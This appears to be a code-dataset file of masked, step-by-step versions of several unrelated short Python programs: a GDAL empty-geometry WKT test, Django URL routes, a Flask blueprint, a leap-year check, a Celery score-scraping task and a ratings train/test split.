gdaltest.post_reason('WKT is wrong: ' + wkt +\n '. Expected value is: ' + self.expectedOutString)\n return 'fail'\n\n\nempty_wkt_list = [('GEOMETRYCOLLECTION(EMPTY)', 'GEOMETRYCOLLECTION EMPTY'),\n ('MULTIPOLYGON( EMPTY )', 'MULTIPOLYGON EMPTY'), (\n 'MULTILINESTRING(EMPTY)', 'MULTILINESTRING EMPTY'), (\n 'MULTIPOINT(EMPTY)', 'MULTIPOINT EMPTY'), ('POINT ( EMPTY )',\n 'POINT EMPTY'), ('LINESTRING(EMPTY)', 'LINESTRING EMPTY'), (\n 'POLYGON ( EMPTY )', 'POLYGON EMPTY'), ('GEOMETRYCOLLECTION EMPTY',\n 'GEOMETRYCOLLECTION EMPTY'), ('MULTIPOLYGON EMPTY',\n 'MULTIPOLYGON EMPTY'), ('MULTILINESTRING EMPTY',\n 'MULTILINESTRING EMPTY'), ('MULTIPOINT EMPTY', 'MULTIPOINT EMPTY'), (\n 'POINT EMPTY', 'POINT EMPTY'), ('LINESTRING EMPTY', 'LINESTRING EMPTY'),\n ('POLYGON EMPTY', 'POLYGON EMPTY')]\n\n\ndef ogr_wktempty_test_partial_empty_geoms():\n wkt = 'MULTIPOINT (1 1)'\n geom = ogr.CreateGeometryFromWkt(wkt)\n geom.AddGeometry(ogr.Geometry(type=ogr.wkbPoint))\n if geom.ExportToWkt() != wkt:\n gdaltest.post_reason('WKT is wrong: ' + geom.ExportToWkt() +\n '. Expected value is: ' + wkt)\n return 'fail'\n geom = ogr.CreateGeometryFromWkt('MULTIPOINT EMPTY')\n geom.AddGeometry(ogr.Geometry(type=ogr.wkbPoint))\n geom.AddGeometry(ogr.CreateGeometryFromWkt('POINT (1 1)'))\n wkt = 'MULTIPOINT (1 1)'\n if geom.ExportToWkt() != wkt:\n gdaltest.post_reason('WKT is wrong: ' + geom.ExportToWkt() +\n '. Expected value is: ' + wkt)\n return 'fail'\n wkt = 'MULTILINESTRING ((0 1,2 3,4 5,0 1))'\n geom = ogr.CreateGeometryFromWkt(wkt)\n geom.AddGeometry(ogr.Geometry(type=ogr.wkbLineString))\n if geom.ExportToWkt() != wkt:\n gdaltest.post_reason('WKT is wrong: ' + geom.ExportToWkt() +\n '. Expected value is: ' + wkt)\n return 'fail'\n geom = ogr.CreateGeometryFromWkt('MULTILINESTRING EMPTY')\n geom.AddGeometry(ogr.Geometry(type=ogr.wkbLineString))\n geom.AddGeometry(ogr.CreateGeometryFromWkt('LINESTRING (0 1,2 3,4 5,0 1)'))\n wkt = 'MULTILINESTRING ((0 1,2 3,4 5,0 1))'\n if geom.ExportToWkt() != wkt:\n gdaltest.post_reason('WKT is wrong: ' + geom.ExportToWkt() +\n '. Expected value is: ' + wkt)\n return 'fail'\n wkt = 'POLYGON ((100 0,100 10,110 10,100 0))'\n geom = ogr.CreateGeometryFromWkt(wkt)\n geom.AddGeometry(ogr.Geometry(type=ogr.wkbLinearRing))\n if geom.ExportToWkt() != wkt:\n gdaltest.post_reason('WKT is wrong: ' + geom.ExportToWkt() +\n '. Expected value is: ' + wkt)\n return 'fail'\n wkt = 'POLYGON EMPTY'\n geom = ogr.CreateGeometryFromWkt(wkt)\n geom.AddGeometry(ogr.Geometry(type=ogr.wkbLinearRing))\n ring = ogr.Geometry(type=ogr.wkbLinearRing)\n ring.AddPoint_2D(0, 0)\n ring.AddPoint_2D(10, 0)\n ring.AddPoint_2D(10, 10)\n ring.AddPoint_2D(0, 10)\n ring.AddPoint_2D(0, 0)\n geom.AddGeometry(ring)\n if geom.ExportToWkt() != wkt:\n gdaltest.post_reason('WKT is wrong: ' + geom.ExportToWkt() +\n '. Expected value is: ' + wkt)\n return 'fail'\n wkt = 'MULTIPOLYGON (((0 0,0 10,10 10,0 0)))'\n geom = ogr.CreateGeometryFromWkt(wkt)\n geom.AddGeometry(ogr.Geometry(type=ogr.wkbPolygon))\n if geom.ExportToWkt() != wkt:\n gdaltest.post_reason('WKT is wrong: ' + geom.ExportToWkt() +\n '. Expected value is: ' + wkt)\n return 'fail'\n geom = ogr.CreateGeometryFromWkt('MULTIPOLYGON EMPTY')\n geom.AddGeometry(ogr.Geometry(type=ogr.wkbPolygon))\n geom.AddGeometry(ogr.CreateGeometryFromWkt(\n 'POLYGON ((100 0,100 10,110 10,100 0))'))\n wkt = 'MULTIPOLYGON (((100 0,100 10,110 10,100 0)))'\n if geom.ExportToWkt() != wkt:\n gdaltest.post_reason('WKT is wrong: ' + geom.ExportToWkt() +\n '. Expected value is: ' + wkt)\n return 'fail'\n return 'success'\n\n\ngdaltest_list = []\nfor item in empty_wkt_list:\n ut = TestWktEmpty(item[0], item[1])\n gdaltest_list.append((ut.CheckIsEmpty, item[0]))\ngdaltest_list.append(ogr_wktempty_test_partial_empty_geoms)\nif __name__ == '__main__':\n gdaltest.setup_run('ogr_wktempty')\n gdaltest.run_tests(gdaltest_list)\n gdaltest.summarize()\n",
"step-4": "import os\nimport sys\nimport string\nsys.path.append('../pymod')\nimport gdaltest\nimport ogrtest\nfrom osgeo import ogr\nfrom osgeo import gdal\n\n\nclass TestWktEmpty:\n\n def __init__(self, inString, expectedOutString):\n self.inString = inString\n self.expectedOutString = expectedOutString\n\n def isEmpty(self, geom):\n try:\n ogr.Geometry.IsEmpty\n except:\n return 'skip'\n if geom.IsEmpty() == False:\n geom.Destroy()\n gdaltest.post_reason(\n 'IsEmpty returning false for an empty geometry')\n return 'fail'\n return 'success'\n\n def CheckIsEmpty(self):\n geom = ogr.CreateGeometryFromWkt(self.inString)\n wkt = geom.ExportToWkt()\n if self.expectedOutString != 'POINT EMPTY':\n if ogr.CreateGeometryFromWkb(geom.ExportToWkb()).ExportToWkt(\n ) != wkt:\n return 'fail'\n if wkt == self.expectedOutString:\n if self.isEmpty(geom) == 'fail':\n return 'fail'\n else:\n return 'success'\n else:\n gdaltest.post_reason('WKT is wrong: ' + wkt +\n '. Expected value is: ' + self.expectedOutString)\n return 'fail'\n\n\nempty_wkt_list = [('GEOMETRYCOLLECTION(EMPTY)', 'GEOMETRYCOLLECTION EMPTY'),\n ('MULTIPOLYGON( EMPTY )', 'MULTIPOLYGON EMPTY'), (\n 'MULTILINESTRING(EMPTY)', 'MULTILINESTRING EMPTY'), (\n 'MULTIPOINT(EMPTY)', 'MULTIPOINT EMPTY'), ('POINT ( EMPTY )',\n 'POINT EMPTY'), ('LINESTRING(EMPTY)', 'LINESTRING EMPTY'), (\n 'POLYGON ( EMPTY )', 'POLYGON EMPTY'), ('GEOMETRYCOLLECTION EMPTY',\n 'GEOMETRYCOLLECTION EMPTY'), ('MULTIPOLYGON EMPTY',\n 'MULTIPOLYGON EMPTY'), ('MULTILINESTRING EMPTY',\n 'MULTILINESTRING EMPTY'), ('MULTIPOINT EMPTY', 'MULTIPOINT EMPTY'), (\n 'POINT EMPTY', 'POINT EMPTY'), ('LINESTRING EMPTY', 'LINESTRING EMPTY'),\n ('POLYGON EMPTY', 'POLYGON EMPTY')]\n\n\ndef ogr_wktempty_test_partial_empty_geoms():\n wkt = 'MULTIPOINT (1 1)'\n geom = ogr.CreateGeometryFromWkt(wkt)\n geom.AddGeometry(ogr.Geometry(type=ogr.wkbPoint))\n if geom.ExportToWkt() != wkt:\n gdaltest.post_reason('WKT is wrong: ' + geom.ExportToWkt() +\n '. Expected value is: ' + wkt)\n return 'fail'\n geom = ogr.CreateGeometryFromWkt('MULTIPOINT EMPTY')\n geom.AddGeometry(ogr.Geometry(type=ogr.wkbPoint))\n geom.AddGeometry(ogr.CreateGeometryFromWkt('POINT (1 1)'))\n wkt = 'MULTIPOINT (1 1)'\n if geom.ExportToWkt() != wkt:\n gdaltest.post_reason('WKT is wrong: ' + geom.ExportToWkt() +\n '. Expected value is: ' + wkt)\n return 'fail'\n wkt = 'MULTILINESTRING ((0 1,2 3,4 5,0 1))'\n geom = ogr.CreateGeometryFromWkt(wkt)\n geom.AddGeometry(ogr.Geometry(type=ogr.wkbLineString))\n if geom.ExportToWkt() != wkt:\n gdaltest.post_reason('WKT is wrong: ' + geom.ExportToWkt() +\n '. Expected value is: ' + wkt)\n return 'fail'\n geom = ogr.CreateGeometryFromWkt('MULTILINESTRING EMPTY')\n geom.AddGeometry(ogr.Geometry(type=ogr.wkbLineString))\n geom.AddGeometry(ogr.CreateGeometryFromWkt('LINESTRING (0 1,2 3,4 5,0 1)'))\n wkt = 'MULTILINESTRING ((0 1,2 3,4 5,0 1))'\n if geom.ExportToWkt() != wkt:\n gdaltest.post_reason('WKT is wrong: ' + geom.ExportToWkt() +\n '. Expected value is: ' + wkt)\n return 'fail'\n wkt = 'POLYGON ((100 0,100 10,110 10,100 0))'\n geom = ogr.CreateGeometryFromWkt(wkt)\n geom.AddGeometry(ogr.Geometry(type=ogr.wkbLinearRing))\n if geom.ExportToWkt() != wkt:\n gdaltest.post_reason('WKT is wrong: ' + geom.ExportToWkt() +\n '. Expected value is: ' + wkt)\n return 'fail'\n wkt = 'POLYGON EMPTY'\n geom = ogr.CreateGeometryFromWkt(wkt)\n geom.AddGeometry(ogr.Geometry(type=ogr.wkbLinearRing))\n ring = ogr.Geometry(type=ogr.wkbLinearRing)\n ring.AddPoint_2D(0, 0)\n ring.AddPoint_2D(10, 0)\n ring.AddPoint_2D(10, 10)\n ring.AddPoint_2D(0, 10)\n ring.AddPoint_2D(0, 0)\n geom.AddGeometry(ring)\n if geom.ExportToWkt() != wkt:\n gdaltest.post_reason('WKT is wrong: ' + geom.ExportToWkt() +\n '. Expected value is: ' + wkt)\n return 'fail'\n wkt = 'MULTIPOLYGON (((0 0,0 10,10 10,0 0)))'\n geom = ogr.CreateGeometryFromWkt(wkt)\n geom.AddGeometry(ogr.Geometry(type=ogr.wkbPolygon))\n if geom.ExportToWkt() != wkt:\n gdaltest.post_reason('WKT is wrong: ' + geom.ExportToWkt() +\n '. Expected value is: ' + wkt)\n return 'fail'\n geom = ogr.CreateGeometryFromWkt('MULTIPOLYGON EMPTY')\n geom.AddGeometry(ogr.Geometry(type=ogr.wkbPolygon))\n geom.AddGeometry(ogr.CreateGeometryFromWkt(\n 'POLYGON ((100 0,100 10,110 10,100 0))'))\n wkt = 'MULTIPOLYGON (((100 0,100 10,110 10,100 0)))'\n if geom.ExportToWkt() != wkt:\n gdaltest.post_reason('WKT is wrong: ' + geom.ExportToWkt() +\n '. Expected value is: ' + wkt)\n return 'fail'\n return 'success'\n\n\ngdaltest_list = []\nfor item in empty_wkt_list:\n ut = TestWktEmpty(item[0], item[1])\n gdaltest_list.append((ut.CheckIsEmpty, item[0]))\ngdaltest_list.append(ogr_wktempty_test_partial_empty_geoms)\nif __name__ == '__main__':\n gdaltest.setup_run('ogr_wktempty')\n gdaltest.run_tests(gdaltest_list)\n gdaltest.summarize()\n",
"step-5": "#!/usr/bin/env python\n###############################################################################\n# $Id$\n#\n# Project: GDAL/OGR Test Suite\n# Purpose: Test support for the various \"EMPTY\" WKT geometry representations.\n# Author: Frank Warmerdam <warmerdam@pobox.com>\n# \n###############################################################################\n# Copyright (c) 2004, Frank Warmerdam <warmerdam@pobox.com>\n# Copyright (c) 2008, Even Rouault <even dot rouault at mines-paris dot org>\n# \n# This library is free software; you can redistribute it and/or\n# modify it under the terms of the GNU Library General Public\n# License as published by the Free Software Foundation; either\n# version 2 of the License, or (at your option) any later version.\n# \n# This library is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU\n# Library General Public License for more details.\n# \n# You should have received a copy of the GNU Library General Public\n# License along with this library; if not, write to the\n# Free Software Foundation, Inc., 59 Temple Place - Suite 330,\n# Boston, MA 02111-1307, USA.\n###############################################################################\n\nimport os\nimport sys\nimport string\n\nsys.path.append( '../pymod' )\n\nimport gdaltest\nimport ogrtest\nfrom osgeo import ogr\nfrom osgeo import gdal\n\nclass TestWktEmpty:\n def __init__( self, inString, expectedOutString ):\n self.inString = inString\n self.expectedOutString = expectedOutString\n\n def isEmpty(self, geom):\n try:\n ogr.Geometry.IsEmpty\n except:\n return 'skip'\n\n if (geom.IsEmpty() == False):\n geom.Destroy()\n gdaltest.post_reason (\"IsEmpty returning false for an empty geometry\")\n return 'fail'\n\n return 'success'\n\n def CheckIsEmpty(self):\n geom = ogr.CreateGeometryFromWkt( self.inString )\n wkt = geom.ExportToWkt()\n\n if self.expectedOutString != 'POINT EMPTY':\n if ogr.CreateGeometryFromWkb(geom.ExportToWkb()).ExportToWkt() != wkt:\n return 'fail'\n\n if wkt == self.expectedOutString:\n if self.isEmpty(geom) == 'fail':\n return 'fail'\n else:\n return 'success'\n else:\n gdaltest.post_reason( 'WKT is wrong: ' + wkt + '. Expected value is: ' + self.expectedOutString )\n return 'fail'\n\nempty_wkt_list = [ \\\n ('GEOMETRYCOLLECTION(EMPTY)', 'GEOMETRYCOLLECTION EMPTY'),\n ('MULTIPOLYGON( EMPTY )', 'MULTIPOLYGON EMPTY'),\n ('MULTILINESTRING(EMPTY)', 'MULTILINESTRING EMPTY'),\n ('MULTIPOINT(EMPTY)', 'MULTIPOINT EMPTY'),\n ('POINT ( EMPTY )', 'POINT EMPTY'),\n ('LINESTRING(EMPTY)', 'LINESTRING EMPTY'),\n ('POLYGON ( EMPTY )', 'POLYGON EMPTY'),\n\n ('GEOMETRYCOLLECTION EMPTY', 'GEOMETRYCOLLECTION EMPTY'),\n ('MULTIPOLYGON EMPTY', 'MULTIPOLYGON EMPTY'),\n ('MULTILINESTRING EMPTY', 'MULTILINESTRING EMPTY'),\n ('MULTIPOINT EMPTY', 'MULTIPOINT EMPTY'),\n ('POINT EMPTY', 'POINT EMPTY'),\n ('LINESTRING EMPTY', 'LINESTRING EMPTY'),\n ('POLYGON EMPTY', 'POLYGON EMPTY')\n ]\n\n\ndef ogr_wktempty_test_partial_empty_geoms():\n\n # Multipoint with a valid point and an empty point\n wkt = 'MULTIPOINT (1 1)'\n geom = ogr.CreateGeometryFromWkt(wkt)\n geom.AddGeometry(ogr.Geometry( type = ogr.wkbPoint ))\n if geom.ExportToWkt() != wkt:\n gdaltest.post_reason( 'WKT is wrong: ' + geom.ExportToWkt() + '. Expected value is: ' + wkt )\n return 'fail'\n\n # Multipoint with an empty point and a valid point\n geom = ogr.CreateGeometryFromWkt('MULTIPOINT EMPTY')\n geom.AddGeometry(ogr.Geometry( type = ogr.wkbPoint ))\n geom.AddGeometry(ogr.CreateGeometryFromWkt('POINT (1 1)'))\n wkt = 'MULTIPOINT (1 1)'\n if geom.ExportToWkt() != wkt:\n gdaltest.post_reason( 'WKT is wrong: ' + geom.ExportToWkt() + '. Expected value is: ' + wkt )\n return 'fail'\n\n # Multilinestring with a valid string and an empty linestring\n wkt = 'MULTILINESTRING ((0 1,2 3,4 5,0 1))'\n geom = ogr.CreateGeometryFromWkt(wkt)\n geom.AddGeometry(ogr.Geometry( type = ogr.wkbLineString ))\n if geom.ExportToWkt() != wkt:\n gdaltest.post_reason( 'WKT is wrong: ' + geom.ExportToWkt() + '. Expected value is: ' + wkt )\n return 'fail'\n\n # Multilinestring with an empty linestring and a valid linestring\n geom = ogr.CreateGeometryFromWkt('MULTILINESTRING EMPTY')\n geom.AddGeometry(ogr.Geometry( type = ogr.wkbLineString ))\n geom.AddGeometry(ogr.CreateGeometryFromWkt('LINESTRING (0 1,2 3,4 5,0 1)'))\n wkt = 'MULTILINESTRING ((0 1,2 3,4 5,0 1))'\n if geom.ExportToWkt() != wkt:\n gdaltest.post_reason( 'WKT is wrong: ' + geom.ExportToWkt() + '. Expected value is: ' + wkt )\n return 'fail'\n\n # Polygon with a valid external ring and an empty internal ring\n wkt = 'POLYGON ((100 0,100 10,110 10,100 0))'\n geom = ogr.CreateGeometryFromWkt(wkt)\n geom.AddGeometry(ogr.Geometry( type = ogr.wkbLinearRing ))\n if geom.ExportToWkt() != wkt:\n gdaltest.post_reason( 'WKT is wrong: ' + geom.ExportToWkt() + '. Expected value is: ' + wkt )\n return 'fail'\n\n # Polygon with an empty external ring and a valid internal ring\n wkt = 'POLYGON EMPTY'\n geom = ogr.CreateGeometryFromWkt(wkt)\n geom.AddGeometry(ogr.Geometry( type = ogr.wkbLinearRing ))\n ring = ogr.Geometry( type = ogr.wkbLinearRing )\n ring.AddPoint_2D( 0, 0)\n ring.AddPoint_2D( 10, 0)\n ring.AddPoint_2D( 10, 10)\n ring.AddPoint_2D( 0, 10)\n ring.AddPoint_2D( 0, 0)\n geom.AddGeometry(ring)\n if geom.ExportToWkt() != wkt:\n gdaltest.post_reason( 'WKT is wrong: ' + geom.ExportToWkt() + '. Expected value is: ' + wkt )\n return 'fail'\n\n # Multipolygon with a valid polygon and an empty polygon\n wkt = 'MULTIPOLYGON (((0 0,0 10,10 10,0 0)))'\n geom = ogr.CreateGeometryFromWkt(wkt)\n geom.AddGeometry(ogr.Geometry( type = ogr.wkbPolygon ))\n if geom.ExportToWkt() != wkt:\n gdaltest.post_reason( 'WKT is wrong: ' + geom.ExportToWkt() + '. Expected value is: ' + wkt )\n return 'fail'\n\n # Multipolygon with an empty polygon and a valid polygon\n geom = ogr.CreateGeometryFromWkt('MULTIPOLYGON EMPTY')\n geom.AddGeometry(ogr.Geometry( type = ogr.wkbPolygon ))\n geom.AddGeometry(ogr.CreateGeometryFromWkt('POLYGON ((100 0,100 10,110 10,100 0))'))\n wkt = 'MULTIPOLYGON (((100 0,100 10,110 10,100 0)))'\n if geom.ExportToWkt() != wkt:\n gdaltest.post_reason( 'WKT is wrong: ' + geom.ExportToWkt() + '. Expected value is: ' + wkt )\n return 'fail'\n\n return 'success'\n\n\ngdaltest_list = []\n\nfor item in empty_wkt_list:\n ut = TestWktEmpty( item[0], item[1] )\n gdaltest_list.append( (ut.CheckIsEmpty, item[0]) )\ngdaltest_list.append( ogr_wktempty_test_partial_empty_geoms )\n\nif __name__ == '__main__':\n\n gdaltest.setup_run( 'ogr_wktempty' )\n\n gdaltest.run_tests( gdaltest_list )\n\n gdaltest.summarize()\n\n",
"step-ids": [
5,
6,
7,
8,
9
]
}
|
[
5,
6,
7,
8,
9
] |
from django.urls import path
from .views.home import Home
from .views.signup import Signup
from .views.login import Login
urlpatterns = [
path('', Home.as_view(), name='home'),
path('signup', Signup.as_view(), name='signup'),
path('login', Login.as_view(), name='login'),
]
|
normal
|
{
"blob_id": "979a387e29867818ffad7291511ff0be40dee118",
"index": 1938,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nurlpatterns = [path('', Home.as_view(), name='home'), path('signup', Signup\n .as_view(), name='signup'), path('login', Login.as_view(), name='login')]\n",
"step-3": "from django.urls import path\nfrom .views.home import Home\nfrom .views.signup import Signup\nfrom .views.login import Login\nurlpatterns = [path('', Home.as_view(), name='home'), path('signup', Signup\n .as_view(), name='signup'), path('login', Login.as_view(), name='login')]\n",
"step-4": "from django.urls import path\nfrom .views.home import Home\nfrom .views.signup import Signup\nfrom .views.login import Login\nurlpatterns = [\n path('', Home.as_view(), name='home'),\n path('signup', Signup.as_view(), name='signup'),\n path('login', Login.as_view(), name='login'),\n]\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
__author__ = 'Xomak'
add_requests = Blueprint('addrequests', __name__, template_folder='templates')
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
from flask import Blueprint
__author__ = 'Xomak'
add_requests = Blueprint('addrequests', __name__, template_folder='templates')
from . import routes
<|reserved_special_token_1|>
"""
Add requests application (adding and managing add-requests)
"""
from flask import Blueprint
__author__ = 'Xomak'
add_requests = Blueprint('addrequests', __name__, template_folder='templates', )
from . import routes
|
flexible
|
{
"blob_id": "d39965c3070ec25230b4d6977ff949b3db070ab6",
"index": 7399,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n__author__ = 'Xomak'\nadd_requests = Blueprint('addrequests', __name__, template_folder='templates')\n<mask token>\n",
"step-3": "<mask token>\nfrom flask import Blueprint\n__author__ = 'Xomak'\nadd_requests = Blueprint('addrequests', __name__, template_folder='templates')\nfrom . import routes\n",
"step-4": "\"\"\"\nAdd requests application (adding and managing add-requests)\n\"\"\"\n\nfrom flask import Blueprint\n\n__author__ = 'Xomak'\n\nadd_requests = Blueprint('addrequests', __name__, template_folder='templates', )\n\nfrom . import routes",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
if ano1 == 0 and ano2 != 0:
print('\nO ano de {} é Bissexto !!'.format(ano))
else:
print('\nO ano de {} não foi Bissexto !!'.format(ano))
<|reserved_special_token_1|>
ano = int(input('\nInforme o ano: '))
ano1 = ano % 4
ano2 = ano % 100
if ano1 == 0 and ano2 != 0:
print('\nO ano de {} é Bissexto !!'.format(ano))
else:
print('\nO ano de {} não foi Bissexto !!'.format(ano))
<|reserved_special_token_1|>
# Enunciado: faça um programa que leia um ano qualquer e mostre se ele é BISEXTO.
ano = int(input('\nInforme o ano: '))
ano1 = ano % 4
ano2 = ano % 100
if ano1 == 0 and ano2 != 0:
print('\nO ano de {} é Bissexto !!'.format(ano))
else:
print('\nO ano de {} não foi Bissexto !!'.format(ano))
|
flexible
|
{
"blob_id": "daeb11000978d14a05ea62113dcf6e30d6a98b15",
"index": 3590,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nif ano1 == 0 and ano2 != 0:\n print('\\nO ano de {} é Bissexto !!'.format(ano))\nelse:\n print('\\nO ano de {} não foi Bissexto !!'.format(ano))\n",
"step-3": "ano = int(input('\\nInforme o ano: '))\nano1 = ano % 4\nano2 = ano % 100\nif ano1 == 0 and ano2 != 0:\n print('\\nO ano de {} é Bissexto !!'.format(ano))\nelse:\n print('\\nO ano de {} não foi Bissexto !!'.format(ano))\n",
"step-4": "# Enunciado: faça um programa que leia um ano qualquer e mostre se ele é BISEXTO.\n\nano = int(input('\\nInforme o ano: '))\n\nano1 = ano % 4\nano2 = ano % 100\n\nif ano1 == 0 and ano2 != 0:\n print('\\nO ano de {} é Bissexto !!'.format(ano))\nelse:\n print('\\nO ano de {} não foi Bissexto !!'.format(ano))\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
from celery.task.schedules import crontab
from celery.decorators import periodic_task
from celery.utils.log import get_task_logger
from bbapp.scripts.getScores import doScoresScrape, fixScores
logger = get_task_logger(__name__)
@periodic_task(
run_every=(crontab(minute='*/10')),
name="scrape_espn_feed",
ignore_result=True
)
def scrape_espn_feed():
"""
Saves latest image from Flickr
"""
thescores = doScoresScrape()
fixScores(thescores, 'MLB')
logger.info("Scores scraped")
|
normal
|
{
"blob_id": "a9a067ee3b176d2f2ca558b69ce2bc598bb31d22",
"index": 4501,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\n@periodic_task(run_every=crontab(minute='*/10'), name='scrape_espn_feed',\n ignore_result=True)\ndef scrape_espn_feed():\n \"\"\"\n Saves latest image from Flickr\n \"\"\"\n thescores = doScoresScrape()\n fixScores(thescores, 'MLB')\n logger.info('Scores scraped')\n",
"step-3": "<mask token>\nlogger = get_task_logger(__name__)\n\n\n@periodic_task(run_every=crontab(minute='*/10'), name='scrape_espn_feed',\n ignore_result=True)\ndef scrape_espn_feed():\n \"\"\"\n Saves latest image from Flickr\n \"\"\"\n thescores = doScoresScrape()\n fixScores(thescores, 'MLB')\n logger.info('Scores scraped')\n",
"step-4": "from celery.task.schedules import crontab\nfrom celery.decorators import periodic_task\nfrom celery.utils.log import get_task_logger\nfrom bbapp.scripts.getScores import doScoresScrape, fixScores\nlogger = get_task_logger(__name__)\n\n\n@periodic_task(run_every=crontab(minute='*/10'), name='scrape_espn_feed',\n ignore_result=True)\ndef scrape_espn_feed():\n \"\"\"\n Saves latest image from Flickr\n \"\"\"\n thescores = doScoresScrape()\n fixScores(thescores, 'MLB')\n logger.info('Scores scraped')\n",
"step-5": "from celery.task.schedules import crontab\nfrom celery.decorators import periodic_task\nfrom celery.utils.log import get_task_logger\n\n\nfrom bbapp.scripts.getScores import doScoresScrape, fixScores\n\nlogger = get_task_logger(__name__)\n\n\n@periodic_task(\n run_every=(crontab(minute='*/10')),\n name=\"scrape_espn_feed\",\n ignore_result=True\n)\ndef scrape_espn_feed():\n \"\"\"\n Saves latest image from Flickr\n \"\"\"\n thescores = doScoresScrape()\n fixScores(thescores, 'MLB')\n logger.info(\"Scores scraped\")",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def split_data(data):
df = pd.read_csv(data)
ranks = df.groupby('userId')['timestamp'].rank(method='first')
counts = df['userId'].map(df.groupby('userId')['timestamp'].apply(len))
df['new_col'] = ranks / counts > 0.8
print(df.head())
train = df.loc[df['new_col'] == False]
test = df.loc[df['new_col'] == True]
train = train.drop(['new_col'], axis=1)
test = test.drop(['new_col'], axis=1)
train.to_csv(
'C:\\Users\\Darkmaster\\PycharmProjects\\Recommender\\Data\\Cvorm\\training.csv'
, header=False, index=False)
test.to_csv(
'C:\\Users\\Darkmaster\\PycharmProjects\\Recommender\\Data\\Cvorm\\testing.csv'
, header=False, index=False)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def split_data(data):
df = pd.read_csv(data)
ranks = df.groupby('userId')['timestamp'].rank(method='first')
counts = df['userId'].map(df.groupby('userId')['timestamp'].apply(len))
df['new_col'] = ranks / counts > 0.8
print(df.head())
train = df.loc[df['new_col'] == False]
test = df.loc[df['new_col'] == True]
train = train.drop(['new_col'], axis=1)
test = test.drop(['new_col'], axis=1)
train.to_csv(
'C:\\Users\\Darkmaster\\PycharmProjects\\Recommender\\Data\\Cvorm\\training.csv'
, header=False, index=False)
test.to_csv(
'C:\\Users\\Darkmaster\\PycharmProjects\\Recommender\\Data\\Cvorm\\testing.csv'
, header=False, index=False)
split_data(
'C:\\Users\\Darkmaster\\PycharmProjects\\Recommender\\Data\\ratings.csv')
<|reserved_special_token_1|>
import matplotlib.pyplot as plt
import pandas as pd
from collections import Counter
import numpy as np
import imdb
import csv
import networkx as nx
from networkx import *
def split_data(data):
df = pd.read_csv(data)
ranks = df.groupby('userId')['timestamp'].rank(method='first')
counts = df['userId'].map(df.groupby('userId')['timestamp'].apply(len))
df['new_col'] = ranks / counts > 0.8
print(df.head())
train = df.loc[df['new_col'] == False]
test = df.loc[df['new_col'] == True]
train = train.drop(['new_col'], axis=1)
test = test.drop(['new_col'], axis=1)
train.to_csv(
'C:\\Users\\Darkmaster\\PycharmProjects\\Recommender\\Data\\Cvorm\\training.csv'
, header=False, index=False)
test.to_csv(
'C:\\Users\\Darkmaster\\PycharmProjects\\Recommender\\Data\\Cvorm\\testing.csv'
, header=False, index=False)
split_data(
'C:\\Users\\Darkmaster\\PycharmProjects\\Recommender\\Data\\ratings.csv')
<|reserved_special_token_1|>
import matplotlib.pyplot as plt
import pandas as pd
from collections import Counter
import numpy as np
import imdb
import csv
import networkx as nx
from networkx import *
def split_data(data):
df = pd.read_csv(data)
ranks = df.groupby('userId')['timestamp'].rank(method='first')
counts = df['userId'].map(df.groupby('userId')['timestamp'].apply(len))
# myes = (ranks / counts) > 0.8
df['new_col'] = (ranks / counts) > 0.8
# print(myes)
print(df.head())
train = df.loc[df['new_col'] == False]
test = df.loc[df['new_col'] == True]
train = train.drop(['new_col'], axis=1)
test = test.drop(['new_col'], axis=1)
train.to_csv(r'C:\Users\Darkmaster\PycharmProjects\Recommender\Data\Cvorm\training.csv', header=False, index=False)
test.to_csv(r'C:\Users\Darkmaster\PycharmProjects\Recommender\Data\Cvorm\testing.csv', header=False, index=False)
# print(test.head())
# ----AND THEN SAVE THOSE AS CSV----
# for row in df.index
# print(test_train)
# print(ranks.head())
# print(counts.head())
# def make_train_or_test_txt(ratingdata):
# df = pd.read_csv(ratingdata)
# users = []
# [users.append(x) for x in df["userId"] if x not in users]
# print(users)
# with open('Data/KGAT/train.txt', 'w') as f:
# # writer = csv.writer(f, delimiter='\t')
# for x in users:
# items = []
# items = df.query('userId == {}'.format(x))["movieId"]
# items = items.values.tolist()
# stringerbell = ''.join((str(e) + "\t") for e in items)
# print(stringerbell)
# # writer.writerow("{}{}".format(x, items))
# # writer.writerow(str(x) + stringerbell)
# f.write(str(x) + "\t" + stringerbell + "\n")
# # print(items)
# # for j in range(len(df)):
# # try:
# # getitems = [x for x in df.loc[df["movieId"]]]
# # except:
# # continue
# print(df.head())
# make_train_or_test_txt('Data/ratings.csv')
split_data('C:\\Users\\Darkmaster\\PycharmProjects\\Recommender\\Data\\ratings.csv')
|
flexible
|
{
"blob_id": "e3b39c6655fc14efec3b3f95b08bc7b2c036cbdc",
"index": 4117,
"step-1": "<mask token>\n",
